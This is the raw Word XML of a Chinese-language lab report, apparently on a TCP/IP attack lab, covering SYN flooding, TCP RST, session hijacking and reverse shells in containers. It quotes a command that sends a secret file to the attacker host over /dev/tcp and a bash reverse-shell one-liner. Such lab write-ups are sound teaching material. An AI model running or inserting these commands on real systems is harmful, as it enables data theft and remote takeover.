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  <w:t xml:space="preserve">Chapter 2: TCP/IP Attack Lab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default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5711813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4</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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徐天浩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52"/>
          <w:szCs w:val="52"/>
          <w:lang w:val="en-US" w:eastAsia="zh-CN" w:bidi="ar"/>
        </w:rPr>
      </w:pP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Task 1:SYN Flooding Attack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首先查看容器ID</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4038600" cy="9829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登录Host A(10.9.0.5)作为此次实验的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victim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，关闭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SYN cookie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。 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SYN cookie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是抵御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SYN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洪泛攻击的一种防御机制。如果机器检测到它受到了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SYN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洪泛攻击，该机制就会启动。可以使用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sysctl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命令打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开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/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关闭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SYN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。因为我们的实验环境是在容器中进行的，可以在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docker-compose.yml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配置中修改该标记值。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4861560" cy="381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登录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Host B(10.9.0.6)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作为此次实验的观察者，并尝试与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victim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建立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TCP(10.9.0.5)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连接，发现可以连接成功</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5267960" cy="1476375"/>
            <wp:effectExtent l="0" t="0" r="508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查看victim(10.9.0.5)的监听端口状态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均为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LISTEN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状态、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ESTABLISHED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状态，并没有发现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SYN_RECV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状态的半连接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)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，并且有与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Host B(10.9.0.6)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的连接记录。 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="803910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登录Attacker(10.9.0.1)作为此次实验的攻击者，在虚拟机对给出的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synflflood.c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攻击程序进行编译，在攻击者容器进行运行，进行对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victim(10.9.0.5)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的攻击。</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5274310" cy="213360"/>
            <wp:effectExtent l="0" t="0" r="139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再次查看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victim(10.9.0.5)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的监听端口状态，有很多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SYN_RECV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状态的连接，说明已经遭受了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SYN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泛洪攻击。 </w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5269230" cy="2642235"/>
            <wp:effectExtent l="0" t="0" r="381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曾经进行过连接的Host B(10.9.0.6)再次请求与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victim(10.9.0.5)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建立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TCP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连接，发现仍能连接成功，说明其对连接记录有一段时间的保存，即泛洪攻击在一段时间内不会对历史连接对象产生影响。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</w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4533900" cy="1394460"/>
            <wp:effectExtent l="0" t="0" r="762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之前没有进行过连接的Host C(10.9.0.7)请求与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victim(10.9.0.5)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建立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TCP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连接，发现不能响应无法连接，受到了泛洪攻击的影响。 </w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4351020" cy="79248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在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docker-compose.yml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文件中修改标记位为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，即打开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SYN flflooding countermeasure</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="3200400" cy="228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之前连接失败的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Host C(10.9.0.7)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再次请求与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victim(10.9.0.5)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建立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TCP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连接，连接成功，说明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SYN flflooding countermeasure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起到了保护作用。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SYN cookies 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防御机制并不是可以防止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TCB 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队列被半连接的状态填满，而是哪怕被填满了，依旧可以进行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tcp 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的连接。 </w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="1351915"/>
            <wp:effectExtent l="0" t="0" r="444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Task 2:TCP RST Attacks on telnet Connections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通过telnet建立与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10.9.0.5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的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TCP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连接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r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5272405" cy="1722755"/>
            <wp:effectExtent l="0" t="0" r="635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使用wireshark 抓取最新的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tcp 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包，信息如下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/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5268595" cy="431800"/>
            <wp:effectExtent l="0" t="0" r="4445" b="1016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那么可以编写下面的程序并运行进行攻击使TCP连接断开。 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5271770" cy="995680"/>
            <wp:effectExtent l="0" t="0" r="1270" b="1016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结果发现远程登录telnet连接被中断。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4083050" cy="152400"/>
            <wp:effectExtent l="0" t="0" r="1270" b="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Task 3:TCP Session Hijacking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通过telnet建立与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10.9.0.5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的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TCP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连接，抓包查看最新的一个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TCP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报文。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drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4472940" cy="1310640"/>
            <wp:effectExtent l="0" t="0" r="7620" b="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在vintim(10.9.0.5)的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/home/seed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的目录下创建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secret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文件，文件内写入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“this is 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l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 secret”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，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attacker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希望在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victim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中执行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cat /home/seed/secret&gt;/dev/tcp/10.9.0.1/9090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，那么可以编写下面的程序并运行进行攻击。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1199515"/>
            <wp:effectExtent l="0" t="0" r="1270" b="444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433705"/>
            <wp:effectExtent l="0" t="0" r="635" b="8255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写入内容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282440" cy="457200"/>
            <wp:effectExtent l="0" t="0" r="0" b="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攻击成功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667000" cy="548640"/>
            <wp:effectExtent l="0" t="0" r="0" b="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Task 4:Creating Reverse Shell using TCP Session Hijacking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通过telnet建立与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10.9.0.5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的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TCP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连接，抓包查看最新的一个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TCP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报文。 </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="4526280" cy="1341120"/>
            <wp:effectExtent l="0" t="0" r="0" b="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452755"/>
            <wp:effectExtent l="0" t="0" r="2540" b="444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attacker希望在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victim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中执行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“/bin/bash -i &gt; /dev/tcp/10.9.0.1/9090 0&lt;&amp;1 2&gt;&amp;1”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，那么可以编写下面的程序并运行进行攻击</w:t>
      </w:r>
    </w:p>
    <w:p/>
    <w:p>
      <w:r>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="114300" distR="114300">
            <wp:extent cx="5273675" cy="1215390"/>
            <wp:effectExtent l="0" t="0" r="14605" b="381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攻击成功，进入</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="default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shell 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57500" cy="845820"/>
            <wp:effectExtent l="0" t="0" r="7620" b="762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XCharter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harter-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D3E52"/>
    <w:rsid w:val="0ACB7CC1"/>
    <w:rsid w:val="0DBA2EA1"/>
    <w:rsid w:val="0F410B8F"/>
    <w:rsid w:val="11D00A2B"/>
    <w:rsid w:val="151643E0"/>
    <w:rsid w:val="1B074355"/>
    <w:rsid w:val="1D173329"/>
    <w:rsid w:val="1FA079FC"/>
    <w:rsid w:val="22E877F0"/>
    <w:rsid w:val="248C4836"/>
    <w:rsid w:val="2718283C"/>
    <w:rsid w:val="275A668A"/>
    <w:rsid w:val="276459E4"/>
    <w:rsid w:val="298951CA"/>
    <w:rsid w:val="2A3733DB"/>
    <w:rsid w:val="2C7661FA"/>
    <w:rsid w:val="2F1C155D"/>
    <w:rsid w:val="2F2B6DEF"/>
    <w:rsid w:val="307450FA"/>
    <w:rsid w:val="330D70B9"/>
    <w:rsid w:val="34B4487A"/>
    <w:rsid w:val="35316852"/>
    <w:rsid w:val="380F339F"/>
    <w:rsid w:val="381F05D3"/>
    <w:rsid w:val="44194673"/>
    <w:rsid w:val="45B077EF"/>
    <w:rsid w:val="47073E5F"/>
    <w:rsid w:val="494503FD"/>
    <w:rsid w:val="4F81212C"/>
    <w:rsid w:val="52FC646B"/>
    <w:rsid w:val="53715D4A"/>
    <w:rsid w:val="540B4B15"/>
    <w:rsid w:val="5A485C2D"/>
    <w:rsid w:val="5B634A62"/>
    <w:rsid w:val="5ECE65F5"/>
    <w:rsid w:val="60870129"/>
    <w:rsid w:val="63BE3D04"/>
    <w:rsid w:val="664A2550"/>
    <w:rsid w:val="6AA02416"/>
    <w:rsid w:val="6FB82B7F"/>
    <w:rsid w:val="7736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303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16799</dc:creator>
  <cp:lastModifiedBy>Miss . Right</cp:lastModifiedBy>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2021-07-12T13:33:57Z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81BE9CC7DD2D4C4C9D53695959EB44BA</vt:lpwstr>
  </property>
</Properties>
</file>